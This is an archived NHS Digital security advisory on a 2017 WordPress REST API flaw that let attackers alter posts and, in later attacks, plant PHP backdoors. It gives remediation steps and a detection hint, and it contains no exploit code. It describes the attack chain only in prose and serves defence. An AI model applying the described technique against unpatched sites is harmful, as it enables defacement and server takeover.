WordPress Vulnerability Allows Unauthorised Modification of Websites

An easy to exploit vulnerability in WordPress allows attackers to modify the content and upload any post within a WordPress website.

Threat ID:: CC-1155
Category:
Threat Severity:: Medium
Threat Vector:: Exploit
Published:: 9 February 2017 12:00 AM

Report a cyber attack: call 0300 303 5222 or email [email protected]

This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of this information contained in this page is at your own risk

Summary

An easy to exploit vulnerability in WordPress allows attackers to modify the content and upload any post within a WordPress website.

Affected platforms

The following platforms are known to be affected:

WordPress Core

WordPress earlier than version 4.7.2

Threat details

The vulnerability exists in WordPress’ REST API (Representational State Transfer Application Program Interface) plugin. It is designed to let programs easily talk together, by using a standardised language between the programs on the internet. REST API is enabled by default in WordPress versions 4.7.0 and 4.7.1.

The attacker takes advantage of REST API's weak PHP language, that allows them to by-pass the authentication required when publishing posts and the ability to amend any part of the website.

Update: CareCERT has escalated this threat to a Medium, following the compromise of thousands of vulnerable WordPress websites on the internet, including some defaced with terrorist propaganda Attackers have also found out how to exploit the vulnerability further and have found a way to install their own PHP code into WordPress sites via the REST API flaw, which could then be used to include a remote PHP file on the victim’s site. This in turn would download and install a backdoor, allowing the attacker the ability to take over the victim’s server.

Remediation steps

Type	Step
	Ensure you have updated to WordPress version 4.7.2 as a patch has been released. Enable automatic updates for WordPress where possible. Consider deploying specific security solutions for content management systems, such as application firewalls. Disable any plugins that allow an editor to embed and update PHP code. Attacks can be detected using the shortcodes associated with plugins like Exec-PHP and Insert PHP

Type

Step

Ensure you have updated to WordPress version 4.7.2 as a patch has been released.
Enable automatic updates for WordPress where possible.
Consider deploying specific security solutions for content management systems, such as application firewalls.
Disable any plugins that allow an editor to embed and update PHP code.
Attacks can be detected using the shortcodes associated with plugins like Exec-PHP and Insert PHP

Last edited: 17 February 2020 11:41 am